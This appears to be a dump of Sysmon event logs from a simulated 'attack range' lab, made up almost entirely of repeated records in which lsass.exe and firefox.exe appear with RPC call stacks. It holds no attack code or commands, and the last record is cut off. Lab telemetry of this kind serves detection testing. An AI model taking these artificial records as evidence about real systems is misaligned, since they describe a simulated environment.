10:51:25.063{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287927Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.063{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287926Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.063{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287925Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.063{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287924Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.063{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287923Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.063{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287922Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.063{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287921Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.063{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287920Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.063{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000216746Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:22.606{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51348-false10.0.1.12-8000- 10341000x8000000000000000287919Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.047{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287918Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.047{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287917Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.047{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287916Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.047{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287915Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.047{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287914Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.047{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287913Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.047{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287912Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.047{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287911Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.047{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287910Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.047{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287909Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.047{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287908Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.047{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287907Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.047{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287906Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.047{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla 